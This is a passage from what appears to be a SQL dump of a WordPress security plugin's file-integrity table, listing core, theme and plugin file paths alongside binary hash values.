-��?ON���[����\'�B�\Z������n','',0,'?'),('}�Ȑ�\\L��`���i)','wp-includes/ID3/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GؐV%�P_��շ�','�I>��a�*R8?�)�p1�U͔�?2�=o��','',0,'?'),('}����=\"$�x���','wp-content/plugins/wp-cerber/assets/flags/si.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����E����z|9�','��ո����� +���}x͐�侟�?#���','',0,'?'),('}���{RҢ���\"','wp-includes/default-constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����f\n��G8��','��/�R�5ڍC,�i�K�f�}���\\4/\0��','',0,'?'),('~w�%w��0���X�','wp-content/themes/wp-barrister/library/images/profile-default.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�_�R��[ӽ���','�-b�rQ��|�����i��z��)�E؆ W','',0,'?'),('~���\'p��|���','wp-content/themes/doctors/core/home/blocks/blog_grid/skin1/c-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�;�Z�����u���','�ѕ�eӰ;P���F��:H ���b#c','',0,'?'),('~Ⱦ/�m�ր�!��','wp-content/plugins/wordfence/views/dashboard/options-group-dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���e4�/����','p�f*�p�m$�F���tw��F��x?�.','',0,'?'),('~��\\��_b�$�-��!','wp-includes/js/jquery/ui/selectable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!9�qf��H7�{B,�z�','W�b��v�(��F4��S�]���@Ĕ�ܾ�','',0,'?'),('~ A�@�[�����','wp-content/plugins/all-in-one-wp-security-and-firewall/images/shield-info-icon-36.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�@�C�U�h�R~\\:','�^\Z�g�(�p(\n��!\"�ͭBy�E\"3;σ�','',0,'?'),('~?�J�I�b*�e�C','wp-admin/images/resize.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lN������','�6��&?�5��?s�qGM`P;','',0,'?'),('~A�H�g��KT��','wp-includes/Requests/Utility/CaseInsensitiveDictionary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:��R�K�ro�H2z','9yԆ&/AX�H�i{b���7f���rw���=m','',0,'?'),('~F��㫎>dy��j�','wp-includes/css/jquery-ui-dialog-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�+x)���A�v6@�@','�/��N��e$�������2:.�}b#�K}','',0,'?'),('~V��Xa]�7p�|R','wp-includes/class-wp-post-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1$�%�:��I�:��','P댭���t\\V�ܛ&��T���\Zݝ�^6�','',0,'?'),('~i�I�;ݭ]�A��S','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/cacert.pem',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','54��⓿�`�����','D��Oo;o�O]+�\0���5�]/\"�&�Q�','',0,'?'),('~q�IP�I���r��','wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-\\�d��oG��\n��2','Sa)����ʗn&B��V�~��11�\'w�(','',0,'?'),('~r�W%�2�������','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/previewer/epsilon-previewer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(t6$}�>�m���',' ��wg�nO�~}U�$b�\0-�jz���cd�٥','',0,'?'),('~}�{ ��>D�}�<','wp-admin/css/code-editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�3�;�7��v:�P���','JlA��Z��q��F�v�<3�I^��k�','',0,'?'),('~�?ͻy�]!q��','wp-content/plugins/disable-gutenberg/inc/resources-enqueue.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vm�zi�Bܲ�����','��N<���o��)�˘�\\9�T!\Z���(�V&:u','',0,'?'),('~��ReOX�f2��`�','wp-includes/class-wp-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;@A��[�oh�́F�','Bms������AKE)(|-�c����ϡ�|��d','',0,'?'),('~��`�Wj��|iLI=��','wp-content/themes/twentynineteen/sass/site/primary/_archives.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�jq�@�hD�)��r','�h����o3U� ��~���n6��>i~�M#','',0,'?'),('~ť�s\0�1y�$�L}h','wp-config-sample.php',0,'�S�Ӌ���h��1����','�S�Ӌ���h��1����','ꐐd`�4�� �\\X��L�u��$dž��Ũdb','',0,'?'),('~�Ӹbc��\Z$�@$��*','wp-content/plugins/wordfence/vendor/composer/autoload_real.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+>r*������mI','E��\0�.�����¿¯�1F�(Df�u�v��˔','',0,'?'),('~��^��%���A�','wp-content/themes/twentytwentyone/assets/sass/06-components/search.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{��8@I�z}��g��','�w][�fv\\mS����^�F\rsd���~�\'��','',0,'?'),('\r��F)��F��B�<��','wp-content/themes/advance/inc/admin/welcome-screen/welcome-screen.php',0,' �Xi�.\\�:�^����',' �Xi�.\\�:�^����','��J0��� I_��J���s�i�izf�\'J�d�','',0,'?'),('�ldK�м����','wp-includes/js/dist/components.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�^�}!��〼����','Ƽy�e�s�<���z�E�,_:�<E� =�+�.','',0,'?'),('-�g\r7_��Ҍ�o�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/classes/class-epsilon-notifications.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;Z�\Z�%�[�,��','a�㱝�-�T�0c��E�M�0|彜H;�','',0,'?'),('0u�R��D��{�1�','wp-content/plugins/wp-cerber/assets/flags/cg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o��K����*�A4�@T$','��Ŕ���wEi�av�A}z�[ɵ�7�6C','',0,'?'),('6\0�O�kvzfTN','wp-includes/js/jquery/ui/effect-fold.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}:h�B�կ}z�x�','�����n�\r�S�/<���b���ե]Na�','',0,'?'),('6����f$T��g\'<','wp-content/plugins/redirection/locale/redirection-de_DE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/͚�\"D�|�P����','��r7��1mX�c尙�#7�O� p��ros�','',0,'?'),('@�={&����}�_','wp-content/plugins/wordfence/modules/login-security/classes/controller/ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}=���v�!ʸ�M','6iV��a#^n�gv�}]����@\"�ǥ{','',0,'?'),('A(Ti�_�*�nt���','wp-content/themes/vision-lite/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�E�)$�!����^a_','�xu\n6[z�x��ek}-�)�tٗ�nW�','',0,'?'),('T+� l��!�*�Ĺ','wp-content/themes/wp-barrister/library/images/icon-li.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1��8�r��/','o[���Z �� $\'��/��V��ǜ���','',0,'?'),('j&��^���b����','wp-includes/ms-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ĉ�L�@�r#�}S���','4n-���J���2����T�hߕ�!�_H/Z\"�','',0,'?'),('j^��SN�-O� �','wp-includes/css/dist/components/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!���{9���YV?\'7�','���f�4qS�� \\���\'��~v���\Z�h�','',0,'?'),('j���)Vk��9���','wp-content/themes/twentytwentyone/assets/js/customize-helpers.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���A�7$I��t�','�-<ݵ~���(�H�6lPLn�M�By����','',0,'?'),('tS�\"��lZ�c��Q','wp-admin/js/auth-app.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qi����~[�|\r�S','A�|f��K�\Z���F|���eɠL�e��ܬ�49','',0,'?'),('w�R1�[��P�B���z','wp-content/plugins/wp-cerber/assets/flags/rs.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����H]��el_L�S','9qp���p~##�7b���o����/�j|�bLl�','',0,'?'),('w�\'�Pe��F�+��V\0','wp-includes/Requests/Proxy/HTTP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/2��������)','J�6d��A��l{��Й\0������J��h','',0,'?'),('�m{8���]�ך��<','wp-content/plugins/wp-cerber/assets/flags/de.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����NJ&z\\ҿ~��i','�Ū3�J��:2;��;�����p�J�kL~�','',0,'?'),('��%G]f�@�%�Z��','wp-content/plugins/wordfence/views/common/section-subtitle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�c��D��Ã��۬','Z�J��wsh5�M�����Eu/jg�[���-�','',0,'?'),('�СqD֚?�i�X','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r��!(�i.+�)Қ�\"{','�Z�Q[���Q���G����7��؍E\"�','',0,'?'),('�pB��k|t5/�5�','wp-content/themes/regina-lite/inc/customizer/panels/news.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.��@džȪ�����N','\\ U��|�$9�;op�U�G��X�k�','',0,'?'),('�K�Q�}U&;&���Q','wp-includes/meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6y��w���N�ш','���W!�\Zس-�Y��}����M��W�e?','',0,'?'),('�P��=�8�[��1','wp-content/themes/weblog/acmethemes/customizer/header-options/header-date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�����he','\n�wl�1�@q���s� \0/�ϱ�3���p� ','',0,'?'),('�tr�εF_� ���','wp-includes/js/wp-emoji-loader.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�hn�1e��胖��S�','�,H���w�0�����N<��l�\n�����!��','',0,'?'),('�͍�����ρb�B','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|DZ(���r��q֧#','�)0������+���^h��v.(��>����','',0,'?'),('�3-�����f��\n','wp-includes/css/dist/list-reusable-blocks/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AU�L�Y����M��','�)�RfZ�����~u3����}\'�?�!>','',0,'?'),('�:F\r9r4��`��S�','wp-content/themes/regina-lite/layout/js/plugins.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l&,|�;8܊ST��M','GS)��[�`,d.!�$H��>ó�����@v','',0,'?'),('�;��!1�>�Y�xQ�','wp-includes/js/dist/block-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L������k�H1��v','���F��%w+7����k �%���W��1Z�`!p','',0,'?'),('�p\\�>trqӿ�aK�','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-typography.php',0,'�c�i�u��n�6���','�c�i�u��n�6���','k�\'��z���Lzm��\rg�gKj_r�e�i躞','',0,'?'),('��ah�#��8�c���','wp-includes/js/tinymce/themes/inlite/theme.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4O��DIc`��EJ','p�v�T5Z>j��j�\0\0��f��xa/g=�&�','',0,'?'),('����V�m��z��覩�','wp-content/themes/skt-toothy/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�9;]�߆�l�>','*wN�kH�|pT�A�)?� E�\0}�7F�� W_','',0,'?'),('��}��D|���� =','wp-content/themes/twentytwentyone/assets/sass/05-blocks/image/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�(�]�E�����','\Z���KI-A�\ZC~#u@�����j������','',0,'?'),('��9~CY��O���','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/package.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�֢W���f=i�ω�','�fႸ��펰������Mc��dzvA�mo','',0,'?'),('���r=����c���Mz','wp-includes/js/dist/is-shallow-equal.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�Y��5n��Y�2-�','��Q�f�1��)ۡV�G�y�8�V�d���%','',0,'?'),('��ں�u���M���[\r','wp-admin/images/wpspin_light-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mS������y\"C���','��66S�X������6O}�4>�p�\"���\'1','',0,'?'),('��Nx��ډ\Z�8yH\\�','wp-admin/js/theme-plugin-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"��[��Q�<�u�)','�s�0�r:l�\\����jަ���-� �+#�ɣ','',0,'?'),('��sSk�i�<4\'c�-6','wp-includes/js/wp-embed.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�N�O8L^�sWkJ�<','�� �E��>�@_�0���!�B����5','',0,'?'),('�ܗ\\2��I���U4ߗk','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/sections/class-epsilon-section-recommended-actions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�Sɍc����[','�{x���Q\"��5|��U=�%JK}�4�P','',0,'?'),('��I����O��)�S�','wp-content/themes/advance/inc/kirki/assets/js/vendor/serialize.js',0,'/\\x]U��R�3.���','/\\x]U��R�3.���','��D��~��E4^J1�g�zh�\0~�R$5g�_�','',0,'?'),('���e��97�aJS','wp-includes/images/smilies/icon_smile.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3�.)�2���p���','ˠ�\",�Rʨ�Tr=�o��r�З:����','',0,'?'),('��XQ���d9r�ڼ��','wp-includes/customize/class-wp-customize-themes-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T��vl��3��','�,V���3R�w���.���\r+4ݦ`=�`R','',0,'?'),('�45���� -�rS�','wp-content/plugins/wp-cerber/assets/flags/kz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0�OC��tЛ>��i3','>ū�[h@H�X���X���Ո�k����55gD�D','',0,'?'),('�b�2�F$)�� �`','wp-content/themes/regina-lite/layout/js/custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%�XI1�\r�','�����.|�ܖ\nGev$�e��01\'4v','',0,'?'),('�el�5�s��E�úQ�','wp-admin/js/media-upload.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�5�.��4�ԝ�Ξ','�����ڦ\'�D�\Z�� v��0��E~��b�','',0,'?'),('�g�I��qn�P�4�R�','wp-content/themes/weblog/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$_tI��<��%G��\0v','+Șa��e%/������X��t����xߡ��&','',0,'?'),('�wT���:�`��','wp-content/themes/advance/footer.php',0,'A��J)�����P,i��','A��J)�����P,i��','�]̴s����B�af��8��Vg��','',0,'?'),('��,CUU����9i-','wp-includes/css/wp-auth-check.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%��L��ԥ|l\"��','�]��\"8y����;��=X\r����Y�$��T;','',0,'?'),('��i�\Z!�[�8$\"�','wp-content/plugins/wordfence/vendor/maxmind-db/reader/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��8e_�T��ƽW','ݬ�IS�P\"�a�� 7J�6�QSv���_��y�','',0,'?'),('������J>Uv�0�','wp-content/plugins/wp-cerber/assets/flags/kp.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ze�+j�U+���]','���ĀN��ɳ���2�.�@+-���YzI','',0,'?'),('��o>�V��_�r��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/list/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����m��v�=l!�','��%B\0/��\"k\0�H���>\0�T!s��]�ݷ�','',0,'?'),('���~\"3�f��Bc��D','wp-content/plugins/wp-cerber/assets/flags/mm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CNU�����2t�J','�$�5AK�`�?w{�\'��5��0��2?II`','',0,'?'),('�ȉV? ��]�)A','wp-includes/js/media-views.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t ���V\\E�P�[�','��,���C �A�ERo=4=^��������|','',0,'?'),('��`h�NkO�N8��','wp-includes/blocks/file/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.��E��T �P\0\\�D','kr\r���.d����y%@IX���t+��Z��','',0,'?'),('���W���=�ԘHd�z','wp-includes/class-wp-site-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*Wy�\ng�MP��)�p1','���C�ƙ&���v����\"�[�SK@� ��Π@','',0,'?'),('��X����-�4�J�_�3','wp-content/plugins/wordfence/lib/wordfenceHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!~��-i���1','P�\0�\r/��;I�\n2\'��\'�v8����%q�Dl','',0,'?'),('����\'>�[��·�','wp-admin/js/user-profile.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;T\n-rh��X�� vs','K6�r4���#�wM�7f�\r����G�\\s#','',0,'?'),('��a\'�0�E�\n�j��','wp-content/plugins/wp-cerber/assets/flags/az.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dj�CO#M�P4`jz�G','=K���LJ���v͎��\ZG詋�3��z�6','',0,'?'),('���Pd������c�3','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r����s�?�K��1\"','�Ĩ:E��kE��N�k\rFO>\"gvP��\"@��','',0,'?'),('�O�X�g]<f@�','wp-admin/css/farbtastic-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S@��[�\\,�3|��!','�Sm�\'�;d`��e�M�0i=�?>����?{','',0,'?'),('� ��M\0� ����o�^','wp-content/themes/advance/inc/kirki/includes/class-kirki-fonts-google.php',0,'�<y��T�7\\��','�<y��T�7\\��','����\\�u*r��s�r�\n\\W>��]�cPHl','',0,'?'),('�3��Ƈe�(ú9�','wp-includes/js/jquery/suggest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s\\+A)���n.;��','I<�{\04�`��<!j��Z8돲��D�HW��','',0,'?'),('��b����N�8�hk�','wp-includes/rest-api/search/class-wp-rest-term-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��cW�U��ԟ�`B ','w�\r��j�*�m�l]� �t��PU�\r�E��','',0,'?'),('��\\�(��wB��I�','wp-admin/network/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�� ΒRU;�pp�b�','��,�!��m4f������NR�\n���B��^','',0,'?'),('�$�+K71�y(�F���','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-backup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l��^gm�d\r9x0�','8�x+&�9�;x�L&�����M!%�C=Y�,M�f','',0,'?'),('�(tTlDά7&��MP.�','wp-includes/js/tinymce/tiny_mce_popup.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B7�I1�0�����d�','���\'З��/!\Z�a!�~�)��1D��','',0,'?'),('�/ �E:K�R寥�v�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��[�SPk�C�','��ںم�Ŵ��}C:�ø=�~��Q�(8��$Q','',0,'?'),('�4�mʧ��(�Z}','wp-content/themes/regina-lite/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2kim� U��T���','y�x�\r/%#9���\0�ǔ7�`$<T�G`�7E|','',0,'?'),('�@�F �Ӡ(���e*[','wp-admin/js/theme-plugin-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 9��\'�74J;��~=Z�','� mُ���tz�fD��d��9�7�T��','',0,'?'),('�B��ه�v<Sv稳','wp-includes/SimplePie/Parse/Date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N\\�O2�����C[\nջ','�=��<��ei|�M�qZ]V[]&I-q9)g�0','',0,'?'),('�F� �GJ��B��s7�','wp-includes/js/media-models.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ӷsj�~�MP����+','���7��}Z��9��ڜ<r���kV~��','',0,'?'),('�L��_k�ݳCh��0A�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/style-admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~\'��o�lD2uǸe>�','օ׃Ű�y��NJ3��9����qF-����o','',0,'?'),('�W= \\\'x\"�W��}��d','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���թ�K���^㥾�','�M�8:�naƋGZ�qQdý!����\'��&g1','',0,'?'),('�_&�����H���g�','wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uׂ-%�?�\'���tJ��','���B��]��>LZo�#Q�^V�x���#�','',0,'?'),('�p�x��\\?;�hE/��','wp-content/themes/twentytwentyone/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}����1��[�','�y)�9�������S�[f<�\0���+{�$/�','',0,'?'),('�w��5���)���','wp-includes/css/wp-embed-template-ie.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)6�� ؞мq ���','�o��+8]�Su�H.�C�g��R9�&�+���\\W�','',0,'?'),('��\0���+OW+�','index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�]�#��N�X�,�','�Dz�\n�}_��7x,�9�t:��\'�\r����','',0,'?'),('�����A���1\Z�;�','wp-includes/rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4|����e��(r',':��.,�0aH�A��\05:�f�s\nf������','',0,'?'),('���]�5�K���^\r�','wp-content/plugins/wp-cerber/admin/cerber-dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2��b;��Vs��5���','�#z\05�ӊ;��:�b�� VJ�X>8��Nk','',0,'?'),('���nM\02]\r^�r','wp-content/themes/twentytwentyone/assets/sass/05-blocks/table/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/\n�Bt�;','VYj8�b��5�f�c]�7W�iƘ2H�N}�2�^','',0,'?'),('���v�A\nGr�3C9`','wp-admin/includes/class-wp-internal-pointers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^I[8T䍍�\\��=','Y^9�A\r+^-��iL�W��j��O���F��','',0,'?'),('���LY9��BP�7`','wp-content/themes/healing-touch/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�d�iQP�~�2JG>','���3Ԥ��}\'/>W���\"�����r�','',0,'?'),('�\Z�R虒�<Fc֛;�','wp-content/plugins/wp-cerber/assets/flags/mp.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4^�>!i��2D�h�','�k\"�z�ƽ��A��i�s\"A�ǽ��(\Z9','',0,'?'),('�3X�/�����\'��P','wp-content/themes/twentytwentyone/inc/starter-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C���ڧ�)E(\Z�U','E���1&�km��{�����\0Ғt�nɿ�HV','',0,'?'),('�Ebl8�y���}����','wp-includes/js/tinymce/plugins/link/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*NȒmQ������','�`3�cYQ����9Wޭ#l���p�S+G��4','',0,'?'),('�Ge��V�o��uQHD','wp-content/themes/healthcare/css/font-awesome/less/rotated-flipped.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Gl�P�d����j��%','�S�՟�Ʃd���3&�^�ߥx���?�l��p�','',0,'?'),('�m>�\0��0X&�^�Q','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/CurlRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pKz��`�)9_@�','��aғYe�q�7YTc�Ȋi$�W�ت�/�!�,','',0,'?'),('��\"�@#���u','wp-content/themes/doctors/core/includes/trunk/ds1/ds1_getver.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\ZSs�2�9�ȎA�','��BU^;o9����oF�{f�~�/�qi','',0,'?'),('��Ǔ��肴����l','wp-content/themes/twentytwenty/assets/js/editor-script-block.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���A�Q~�.Yf�1:D',':馈���x�t[cJ��=�\Z�\Z���h��0','',0,'?'),('��?���z6���aDz','wp-content/plugins/wordfence/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�����mP�','j*�e����doX�~�7��&���N�9�|L���','',0,'?'),('��&R�/�\"��On!r�','wp-content/themes/weblog/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�q�8��Hr�!U','\Z�K��x\rdͳ��^�$�&-��(㩹}.','',0,'?'),('���ʆ��n�D㮖�(','wp-admin/css/install.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�],�:��f��3','�(��Ty��0-��#�FOs�;�=��K�o�','',0,'?'),('��j����5��f�j�','wp-content/plugins/wordfence/views/tools/options-group-live-traffic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!��L|�y+5*�M\0Qk','�����O�q��Fri���e�+�K� �/;C','',0,'?'),('����+�1ͪ�v','wp-content/themes/weblog/acmethemes/customizer/options/options-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�m�j�2��A�d�','&9�j��,���_ep+Tt��q�\r;����-�','',0,'?'),('���>�n��n���y�Xx','wp-content/themes/doctors/images/demo/bg_1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�5@���^�E�@=L','��¥uE#Z��8x���x�u�N�ЛQ��','',0,'?'),('�)ũ��2[� �4�_a','wp-includes/class-walker-category-dropdown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��s�ny�ld�)��','�ՠ���P)_�s�)v]��Չ\"����|�','',0,'?'),('�+D�K�%\\u��40�','wp-content/themes/weblog/acmethemes/core/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=v�\\ %Usy(','��ı�9�����\'�0B~-�����$D����','',0,'?'),('�+o�2��8�E�+K%;�','wp-includes/PHPMailer/PHPMailer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�in=��2�����:G','����r����p�NX����7�����?H�RG��','',0,'?'),('�:+[��g��CZ���','wp-includes/template-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z� ҿ��܌~���','��\'4�h �䱺��[����E��%��J�H�','',0,'?'),('�H�F���I!���M9','wp-content/plugins/wp-cerber/assets/crb-logo-vn.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��h��%t�J���','�Q��6�������V���\0\r��M�9��','',0,'?'),('�Qn�����8�H','wp-content/themes/advance/inc/kirki/includes/class-kirki-active-callback.php',0,'�: ��K��n֨8�B��','�: ��K��n֨8�B��','5��;�o�cU,Mw늀���>�uT��}/@]*�','',0,'?'),('�i2O���+�s�X.�','wp-includes/js/jquery/ui/core.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PC��\r�{�tk�\"x',' �S�����3~�n�F#�EHf�_��7qY@I��','',0,'?'),('���P���M�˝�=U','wp-content/plugins/wordfence/views/dashboard/status-payment-expiring.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','raX\'��z\05+�\"�7','v�$�r�_s�y�Y���U{ؘ?��C','',0,'?'),('���e��-\n�yV','wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���|�Ww�b>E��yJ','�\'�����~�6ȝ\nB���agz���d��Q','',0,'?'),('������PU��ac��','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�YA��G=b�u���','z�,ͥ���t <{@Y{�iy��s���c�(S�L','',0,'?'),('��nv��Z�YV��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�bvA�n�a��1 C��','�g�����z��߶u��p{��!v|�*^��3 